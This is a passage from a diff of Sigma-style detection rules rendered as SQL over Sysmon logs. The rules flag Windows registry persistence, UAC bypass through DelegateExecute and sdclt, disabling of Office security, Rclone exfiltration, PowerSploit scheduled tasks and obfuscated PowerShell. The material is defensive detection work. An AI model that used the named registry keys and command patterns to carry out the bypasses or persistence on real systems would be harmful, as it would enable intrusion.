'%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": "0bbc6369-43e3-453d-9944-cae58821c173", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powertool.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "description": "Bypasses User Account Control using a fileless method", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", - "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", - "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_powershell_public_folder.yml" - }, - { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], "falsepositives": [ - "Software installation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image 